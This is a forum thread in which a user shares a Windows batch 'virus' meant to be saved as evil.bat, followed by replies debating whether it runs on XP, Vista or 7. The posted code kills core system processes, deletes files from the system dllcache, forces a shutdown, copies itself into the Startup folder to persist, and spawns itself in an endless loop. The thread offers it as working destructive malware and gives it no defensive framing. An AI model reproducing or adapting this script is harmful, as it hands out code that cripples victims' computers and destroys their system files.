Breaking Sec

Full Version: Batch Virus [Batch]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Well. I learned this from the original EH when it was 2Ethical hackers. (: There is only a Windows XP Version. [name it evil.bat]
Let me know if there is anything wrong, I havn't used this in a while.

Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
shutdown -s -t 10
copy "Evil.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
:lo
start %0
goto :lo
Don't think windows will let you do that.
Maybe if you ran it as admin in Windows Vista
Nah. Vista and 7 stop you.
Are you sure? it worked on my friends VM...
Did it have any security at all? Even..... Nortan?
lol, but the thing is it doesnt delete any files that wouldnt be restored so most virus scans wont pick it up.
So the files would be restored. Does the virus make sure that they don't get restored? Otherwise this would be incredible pointless
You were right, he had to mess with his shit to get it to run...should still work in XP though, no?
Why don't you test it in a VM?
Pages: 1 2 3
Reference URL's